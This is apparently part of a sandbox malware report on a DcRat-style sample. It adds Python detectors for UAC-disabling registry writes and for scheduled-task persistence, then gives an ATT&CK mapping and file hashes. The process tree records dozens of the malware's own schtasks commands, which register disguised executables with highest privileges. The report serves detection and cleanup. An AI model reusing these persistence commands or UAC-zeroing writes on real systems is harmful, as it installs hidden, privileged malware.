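    # Lower-case the path and map the native NT root names the sandbox prints
    # (REGISTRY\MACHINE, REGISTRY\USER) onto the HKLM / HKU shorthand Sysmon uses.
    path = target_object.lower()
    path = path.replace(r"\registry\machine", "hklm", 1)
    path = path.replace(r"\registry\user", "hku", 1)
    return path


def parse_dword(details: str) -> Optional[int]:
    """Extract the integer from Sysmon's 'DWORD (0x00000000)' Details rendering."""
    match = DWORD_RE.search(details)
    return int(match.group(1), 16) if match else None


def evaluate_registry_events(events: List[Dict]) -> List[Finding]:
    """Return one Finding per value-set event that zeroes a UAC policy value."""
    findings: List[Finding] = []
    for event in events:
        if event.get("EventID") != 13:
            continue
        key, _, name = normalize_key(event["TargetObject"]).rpartition("\\")
        if key != UAC_POLICY_KEY or name not in WEAK_IF_ZERO:
            continue
        if parse_dword(event["Details"]) == 0:
            findings.append(Finding(event["Image"], name, 0, WEAK_IF_ZERO[name]))
    return findings


def effective_posture(findings: List[Finding]) -> str:
    """Summarise what UAC on the host will do once the flagged writes take effect."""
    names = {f.value_name for f in findings}
    if "enablelua" in names:
        return "UAC disabled: after reboot every process of an admin user runs with the full token"
    if "consentpromptbehavioradmin" in names:
        return "UAC on but silent: admin elevation needs no user interaction"
    if "promptonsecuredesktop" in names:
        return "UAC prompts on the user desktop: spoofable, but still need a click"
    return "UAC policy intact"


if __name__ == "__main__":
    hits = evaluate_registry_events(SAMPLE_EVENTS)
    for hit in hits:
        print(f"{hit.image} set {hit.value_name}=0: {hit.impact}")
    print(effective_posture(hits))
```

The key normalisation matters in practice: sandbox output and raw ETW use the native `\REGISTRY\MACHINE` root, Sysmon writes `HKLM`, and a rule keyed on only one spelling misses the other. Restoring the values to 1 / 5 / 1 after an incident is not sufficient on its own, since the copies registered in the scheduled tasks further down will set them to 0 again on the next run.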
Processes

C:\Users\Admin\AppData\Local\Temp\59b9f54f927431d2cf31d3aa202a0843.exe (PID 1176)
  "C:\Users\Admin\AppData\Local\Temp\59b9f54f927431d2cf31d3aa202a0843.exe"
  - Modifies WinLogon for persistence
  - UAC bypass
  - Drops file in Drivers directory
  - Checks computer location settings
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification

    C:\Windows\System32\cmd.exe (PID 1096)
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\vuKmrV6lXC.bat"
      - Suspicious use of WriteProcessMemory

        C:\Windows\system32\w32tm.exe (PID 5052)
          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

        C:\Recovery\WindowsRE\fontdrvhost.exe (PID 1328)
          "C:\Recovery\WindowsRE\fontdrvhost.exe"
          - UAC bypass
          - Checks computer location settings
          - Executes dropped EXE
          - Checks whether UAC is enabled
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: GetForegroundWindowSpam
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          - System policy modification

            C:\Windows\System32\WScript.exe (PID 2600)
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56e953f9-9ea1-4007-8b8b-81948365d831.vbs"

            C:\Windows\System32\WScript.exe (PID 4152)
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1c330845-14ba-4531-95d3-034dd9828f9b.vbs"

The following 42 processes are all C:\Windows\system32\schtasks.exe, each appearing at the top level of the tree and each carrying the same two signatures, "Process spawned unexpected child process" and "Scheduled Task/Job: Scheduled Task":

PID 3936: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /f
PID 3636: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f
PID 3060: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f
PID 3408: schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /f
PID 2520: schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /rl HIGHEST /f
PID 1148: schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /rl HIGHEST /f
PID 2000: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /f
PID 4380: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f
PID 4556: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f
PID 4260: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Users\Public\csrss.exe'" /f
PID 4872: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\csrss.exe'" /rl HIGHEST /f
PID 752: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\csrss.exe'" /rl HIGHEST /f
PID 1404: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /f
PID 3536: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /rl HIGHEST /f
PID 3200: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /rl HIGHEST /f
PID 3012: schtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /f
PID 3820: schtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a0843" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f
PID 4140: schtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f
PID 3720: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /f
PID 396: schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f
PID 2600: schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\spoolsv.exe'" /rl HIGHEST /f
PID 4800: schtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /f
PID 4152: schtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a0843" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f
PID 1032: schtasks.exe /create /tn "59b9f54f927431d2cf31d3aa202a08435" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\59b9f54f927431d2cf31d3aa202a0843.exe'" /rl HIGHEST /f
PID 3836: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Windows\appcompat\Programs\upfc.exe'" /f
PID 4384: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Windows\appcompat\Programs\upfc.exe'" /rl HIGHEST /f
PID 3008: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Windows\appcompat\Programs\upfc.exe'" /rl HIGHEST /f
PID 2820: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe'" /f
PID 4992: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe'" /rl HIGHEST /f
PID 1972: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\en-US\winlogon.exe'" /rl HIGHEST /f
PID 1964: schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\sysmon.exe'" /f
PID 3056: schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f
PID 4160: schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\sysmon.exe'" /rl HIGHEST /f
PID 4768: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /f
PID 2340: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f
PID 4068: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe'" /rl HIGHEST /f
PID 1956: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /f
PID 2940: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f
PID 4516: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\RuntimeBroker.exe'" /rl HIGHEST /f
PID 2484: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /f
PID 4136: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
PID 3592: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\vssvc.exe (PID 5048)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\WmiApSrv.exe (PID 3068)
  C:\Windows\system32\wbem\WmiApSrv.exe
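The schtasks.exe invocations above follow one pattern per dropped copy: a MINUTE-interval task that re-launches the file every few minutes, an ONLOGON task with /rl HIGHEST, and a second MINUTE task with /rl HIGHEST, each pointing at a file named after a Windows process (csrss.exe, winlogon.exe, sppsvc.exe, spoolsv.exe, RuntimeBroker.exe, fontdrvhost.exe, upfc.exe, sysmon.exe) but placed somewhere other than System32. The following is an added detection example, not part of the sandbox report and not DcRat's own code. It parses schtasks /create command lines as they would appear in process-creation telemetry and flags that pattern; four of the sample lines are copied from the tree above, the cleanmgr.exe line is invented as a benign control, and the masquerade-name list, the expected-directory list and the 15-minute threshold are the example's own assumptions.

```python
"""Triage 'schtasks /create' command lines for DcRat-style task persistence.

Added example for this report; not code from the sandbox or from DcRat.
Assumptions: MASQUERADE_NAMES, EXPECTED_DIRS and WATCHDOG_MAX_MINUTES are the
example's own choices; the cleanmgr.exe line is an invented benign case.
"""
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Constructed sample: four lines copied from the process tree above plus one
# benign, invented line for contrast.
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /f''',
    r'''schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\it-IT\sppsvc.exe'" /f''',
    r'''schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\Panther\UnattendGC\fontdrvhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "NightlyCleanup" /sc DAILY /st 02:00 /tr "C:\Windows\System32\cleanmgr.exe" /f''',
]

# Process names that DcRat-style droppers borrow for their copies
# (assumption: this list is the example's, not the report's).
MASQUERADE_NAMES = {
    "csrss.exe", "winlogon.exe", "sppsvc.exe", "spoolsv.exe", "runtimebroker.exe",
    "fontdrvhost.exe", "upfc.exe", "sysmon.exe", "lsass.exe", "smss.exe", "dwm.exe",
}
# Directories where those names are legitimately found (assumption).
EXPECTED_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows"}
# A MINUTE task at or below this interval is treated as a re-launcher (assumption).
WATCHDOG_MAX_MINUTES = 15

# A switch is '/name' optionally followed by a quoted or bare value; a bare value
# may not start with '/' so that '/create /tn' is not read as create=/tn.
SWITCH_RE = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^\s/]\S*))?')


@dataclass
class ScheduledTask:
    name: str
    schedule: str
    modifier: Optional[str]
    target: str
    run_level: Optional[str]


@dataclass
class Finding:
    task: str
    target: str
    reason: str


def parse_schtasks(cmdline: str) -> Optional[ScheduledTask]:
    """Parse a 'schtasks /create' line; return None for anything else."""
    switches: Dict[str, Optional[str]] = {}
    for key, value in SWITCH_RE.findall(cmdline):
        # DcRat wraps the target in single quotes inside the double quotes; strip both layers
        switches[key.lower()] = value.strip('"').strip("'") if value else None
    if "create" not in switches or not switches.get("tr"):
        return None
    return ScheduledTask(
        name=switches.get("tn") or "",
        schedule=(switches.get("sc") or "").upper(),
        modifier=switches.get("mo"),
        target=switches["tr"],
        run_level=(switches.get("rl") or "").upper() or None,
    )


def assess(task: ScheduledTask) -> List[Finding]:
    """Apply the three per-task checks: masquerade path, short interval, elevated logon."""
    findings: List[Finding] = []
    directory, basename = ntpath.split(task.target)
    if basename.lower() in MASQUERADE_NAMES and directory.lower() not in EXPECTED_DIRS:
        findings.append(Finding(task.name, task.target,
                                f"system process name {basename} launched from {directory}"))
    if (task.schedule == "MINUTE" and task.modifier and task.modifier.isdigit()
            and int(task.modifier) <= WATCHDOG_MAX_MINUTES):
        findings.append(Finding(task.name, task.target,
                                f"re-launched every {task.modifier} minute(s)"))
    if task.schedule == "ONLOGON" and task.run_level == "HIGHEST":
        findings.append(Finding(task.name, task.target,
                                "runs at every logon with highest privileges"))
    return findings


def triage(cmdlines: List[str]) -> List[Finding]:
    """Run assess() over each line, then add the cross-task check: one binary
    registered under both an interval trigger and a logon trigger."""
    findings: List[Finding] = []
    schedules_by_target: Dict[str, Set[str]] = defaultdict(set)
    for line in cmdlines:
        task = parse_schtasks(line)
        if task is None:
            continue
        findings.extend(assess(task))
        schedules_by_target[task.target.lower()].add(task.schedule)
    for target, schedules in schedules_by_target.items():
        if {"MINUTE", "ONLOGON"} <= schedules:
            findings.append(Finding("*", target,
                                    "interval task and logon task point at the same binary"))
    return findings


if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(f"[{hit.task}] {hit.target}: {hit.reason}")
```

The path check is what separates this from a plain name match: C:\Windows\System32\fontdrvhost.exe is the real binary, while C:\Recovery\WindowsRE\fontdrvhost.exe and C:\Windows\Panther\UnattendGC\fontdrvhost.exe in this report are dropped copies. On a live host the same logic applies to the task definitions themselves (schtasks /query /xml or the XML files under C:\Windows\System32\Tasks), which is where cleanup has to happen, since deleting the dropped files alone leaves tasks that re-create the error every few minutes.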
Network
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (2)
    Registry Run Keys / Startup Folder (1)
    Winlogon Helper DLL (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (1)
    Disable or Modify Tools (1)
  Modify Registry (4)
Credential Access
  Credentials from Password Stores (1)
    Credentials from Web Browsers (1)
  Unsecured Credentials (1)
    Credentials In Files (1)
Downloads

Filesize: 2.2MB
MD5: dc5aea2370933725deb249ff35911970
SHA1: 6d2cced25ceb383a3a735a8920db593879cc29bd
SHA256: fd9d119fa3c2014012a30882e6f6ed3ac1fab9561f0a6afc46362d3acae0f295
SHA512: 5c3837e3cd7e5bc510d107350d760c6e5cc0ad89804e98c38d327d5e25c95fb5c702f3c19c9704813f0e7df0bc89ec0ce1db3b14aee55f520e38a723b2a8aca0

Filesize: 2.2MB
MD5: 8d3d97921a4f4d3bc4f2a6232419da1c
SHA1: 995a874fcbef603a121927dc055bce608279ae5c
SHA256: c6240a4c22024c286f4444827afc625ec16e24cf485322ad2c0efaab655d7308
SHA512: ec9351cc0373cee9324772010e55e3fa10f29765b62ff8078fd2106db327f33a040be8699fa2193c3c04d3a64a19ce8f06868944a51cbfd2b10702ab483d9eeb

Filesize: 2.2MB
MD5: 722e45b8daf9b4c1bc116f73829dd98b
SHA1: a8e35bc5958119299fcd8d080d2c6465c8748ba5
SHA256: eb13cc17dea657fce65204e58d69eef69fe2eec3048d20cce57f1e88843980d7
SHA512: f2a6a4c65e0e6d1179070c2a03f1683c5d71ef8ff6ebed4aa782d18d9c76e95659000f569e0d664fb9e3f5575a89c7ef6181623f65be6ba3d37b45dc1d893d57

Filesize: 2.2MB
MD5: 96d7491988ae6f61abaccee989d3fa98
SHA1: 3c86f954be8f502a43f52dc83edf4fcc9fe43795
SHA256: 792ca0b9702209dee198a595d0e9c4835f887fd45c9a14066bd3911fcddb8197
SHA512: 71beee463d9d7ee87d88a9dadae54c8db76f7cb7dd7a24d2231c8c9ba427f1392e03d23184df8941a53a65150d43bc52601d46ca0ded538edef1f2bfcd148c2d

Filesize: 2.2MB
MD5: 54b48d7611fb49892fd9f36e6c9eb58c
SHA1: ca6e1ff091ea3624afd344751886e9b4e655a6f3
SHA256: f8fd70996226e10c0e26187249fc0e156c5d5141f6db19e2cf070b75d0e800c8
SHA512: 52312fb241f9c9a3e1978e64127e574e35130b052081ead8eeb3bc9361825738cab14d172e3651effc7b97615cfec9ca565726decb3b721c1754c4f7a84ae754

Filesize: 489B
MD5: 0b2db16ba197e1f81b7e64455c7b96f5
SHA1: 8775fa0d20477e65e0720d8e036f1961f24b988e
SHA256: b310775fac59c3aaed2b97460b02de782e7cbe3e9e8122f481a4732dc57a070e
SHA512: a783686adb8d6c07107228669f65e41c938c244b0e5f60aafbd663e74909af93a2f3b1102262a2a84cfb2b0e549ef51cfac3b437498e9534981685b6e02655b1

Filesize: 713B
MD5: 8551c9baa66c62fdb4a5aa021bef1e79
SHA1: c704c356705b41031592dd10ef740d12a9c6289a
SHA256: 64f21edf6edd71513e7c3b474613bb0d451632f14b33f822dfea59bd2ffa42f2
SHA512: b87e6a104ab9f8e8274cfcbf1962a064931fe0cf791ec0fd28bdf69f3813f2adbc6b2c8e6e14d0fe9bc2cbaa1385fbd8974daa37b1389dd84c4036a8076e82d0

Filesize: 202B
MD5: c5754a838de767e9c8080fb925a5dad9
SHA1: 27adf4b8f9db9a312e7670203cdb3c1e866c811d
SHA256: 80a44ba3f619ce898fc4dee5bad63e77ff183ca2a7956f4df40230df55232462
SHA512: e070060eeb7d0373575074b0c5a5acd6f09b7ea916f02a1f07043ae586e1e2569582a54f26b3fccf958e1d015b2ead1a272691fb63a57d843d49d272f1a5909a

Filesize: 2.2MB
MD5: f35ce36a3fdb9da9d93b6cc2c5c49964
SHA1: ef1c01a531cf3a2c7e407f34eed4dc1210cb7689
SHA256: 19ced0237a73c7073ce91aa9242b189b48111d93c8fbe5df70f8f724f0b70875
SHA512: 9c0b295d309e146295b8c52ffd84c59e32847d669c55a4c6df6e823b5b574e6760b33fc9000dc0f386aac0886add99221c7d46043e7c7107bf4eb1ef302880fa

Filesize: 2.2MB
MD5: 59b9f54f927431d2cf31d3aa202a0843
SHA1: b23d214605133dc8e930f9a9d473c7c7622b4b56
SHA256: 007c244b9dac3fecd6d8df49314f664afaa4c1c823574108f77189c2925e9594
SHA512: 89106822646d8d412d5c956fd01ad37e4b1f34599497f8e362262f82d2d47f4460632019d6ec09da58c45d690ebd03f2812d5809743203be081702680bfb28f8